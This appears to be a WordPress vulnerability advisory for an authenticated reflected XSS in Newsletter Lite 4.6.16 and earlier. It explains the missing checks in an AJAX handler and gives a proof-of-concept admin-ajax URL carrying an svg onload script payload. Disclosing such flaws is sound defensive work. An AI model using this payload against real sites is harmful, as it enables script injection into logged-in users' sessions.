Newsletter Lite <= 4.6.16 - Authenticated Reflected XSS



Description
Lack of CSRF, Authorisation and sanitisation checks in the ajax_load_new_editor() function, registered as an AJAX method, can lead to an authenticated reflected XSS issue.
Proof of Concept
As an authenticated user (with a role as low as a Subscriber), open https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea="><svg/onload=alert(/XSS/)>

Affects Plugin

fixed in version 4.6.18

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 1068
Verified Yes
WPVDB ID 9447

Timeline

Publicly Published 2019-07-01 (23 days ago)
Added 2019-07-10 (13 days ago)
Last Updated 2019-07-16 (7 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin